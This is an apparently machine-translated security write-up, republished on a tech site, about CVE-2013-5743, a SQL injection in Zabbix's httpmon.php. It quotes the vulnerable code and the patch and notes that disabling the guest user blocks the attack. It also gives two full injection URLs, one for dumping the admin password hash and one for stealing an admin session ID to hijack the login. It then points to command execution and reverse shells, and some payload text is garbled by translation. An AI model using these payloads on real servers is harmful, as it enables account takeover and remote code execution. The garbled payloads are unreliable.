Zabbix SQL Injection/RCE - CVE-2013-5743

Sleepy Dragon · 2013/10/17 12:55

From: www.corelan.be/index.php/2…

0 x00 background

The vulnerability was submitted on September 11, 2013, confirmed on September 23, and patched on October 2.

The new 0day, you can directly enter the background through SQL injection, and execute system commands.

Metasploit exploit module is available for this vulnerability. Please pay attention to timely patch by companies using Zabbix.

0x01 Use details

The vulnerability exists in the httpmon.php script and is accessible to unlogged users.

This is because Zabbix has pre-configured a guest user. Users who are not logged in are assigned the access rights of the guest user.

If the guest user is disabled, the httpmon.php script cannot be accessed to exploit this vulnerability.

You can disable the Guest user in the administrator’s admin panel.

As you can see from the figure below, the Applications parameter has SQL injection.

View the source code:

#! php foreach ($_REQUEST['applications'] as $application) { add2favorites('web.httpmon.applications', $application); }Copy the code

Inside the $Application variable, trace the add2Favorites function:

#! php function add2favorites($favobj, $favid, $source = null) { $favorites = get_favorites($favobj); foreach ($favorites as $favorite) { if ($favorite['source'] == $source && $favorite['value'] == $favid) { return true; } } DBstart(); $values = array( 'profileid' => get_dbid('profiles', 'profileid'), 'userid' => CWebUser::$data['userid'], 'idx' => zbx_dbstr($favobj), 'value_id' => $favid, 'type' => PROFILE_TYPE_ID );Copy the code

Enter value_id in the $values array and trace down to see that the variable entered the SQL statement without any filtering:

#! php return DBend(DBexecute('INSERT INTO profiles ('.implode(', ', array_keys($values)).') VALUES ('.implode(', ', $values).')'));Copy the code

The latest Zabbix patch:

#! php Index: frontends/php/include/profiles.inc.php =================================================================== --- frontends/php/include/profiles.inc.php (revision 38884) +++ frontends/php/include/profiles.inc.php (working copy) @@ -148,9 +148,9 @@ 'profileid' => get_dbid('profiles', 'profileid'), 'userid' => self::$userid ['userid'], 'idx' => zbx_dbstr($idx), - $value_type => ($value_type == 'value_str') ? zbx_dbstr($value) : $value, - 'type' => $type, - 'idx2' => $idx2 + $value_type => zbx_dbstr($value), + 'type' => zbx_dbstr($type), + 'idx2' => zbx_dbstr($idx2) ); return DBexecute('INSERT INTO profiles ('.implode(', ', array_keys($values)).') VALUES ('.implode(', ', $values).')'); // string value prepearing if (isset($DB['TYPE']) && $DB['TYPE'] == ZBX_DB_MYSQL) { function zbx_dbstr($var) { if (is_array($var)) { foreach ($var as $vnum => $value) { $var[$vnum] = "'".mysql_real_escape_string($value)."'"; } return $var; } return "'".mysql_real_escape_string($var)."'"; }Copy the code

Variable processing is filtered through a layer of mysql_real_escape_string functions.

In the above vulnerability, the following statement can read the md5 hash value of the administrator’s username and password:

http://zabbix.server/zabbix/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28 28 select 28 select % % % 20 concat 28 alias, 28 concat 28 cast % % % 0 x7e, passwd, 20 as zero x7e % 29% % 20 char 20 from 29, 0 x7e % 29% % 29% % 20 zabbix. Users % Limit % 29, 200, 1%20 floor 28 rand 29 * 2% 29% % 280% % 20 from 29 x % % 20 information_schema. The tables % 20 group 29 a 20 by 20 x % % % % 29Copy the code

But what if the administrator password is too complex and md5 collisions do not show plaintext?

It turns out that Zabbix also stores session values in its database, and none of them seem to be invalidated unless the user clicks to log out.

The following figure shows what the sessions table holds in the database:

So let’s inject the session value of the administrator and log in directly, no need to crash md5 hash.

http://zabbix.server/zabbix/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28 28 select 28 select % % % 20 concat 28 sessionid, 28 concat 28 cast % % % 0 x7e, userid, 0 x7e, 20 the as status % 29% % 20 char 20 from 29, 0 x7e % 29% % 29% % 20 za Bbix. Sessions % 20 where % 20 and 20 status = 0% % 20 userid = 1% limit % 29, 200, 1%20 floor 28 rand 29 * 2% 29% % 280% % 20 from 29 x % % 20 information_sch ema.tables%20group%20by%20x%29a%29Copy the code

Replace the value of the cookie zbx_sessionID with the obtained session:

Then login is successful:

The administrator can run the following commands on wooyun:

WooYun: Zabbix of Sohu, which can cause Intranet penetration

It can also directly rebound the shell to execute commands, which is very convenient. For specific posture, please refer to:

Ten ways to bounce a shell

mo4tech.com (Moment For Technology) is a global community with thousands techies from across the global hang out!Passionate technologists, be it gadget freaks, tech enthusiasts, coders, technopreneurs, or CIOs, you would find them all here.

Zabbix SQL Injection/RCE — CVE-2013-5743

0 x00 background

0x01 Use details

Zabbix SQL Injection/RCE — CVE-2013-5743

0 x00 background

0x01 Use details

Related Posts

Summary of in-station message design

Experience sharing: how to learn from the beginning of programming to BAT work to succeed?

Some lessons from being a lifelong programmer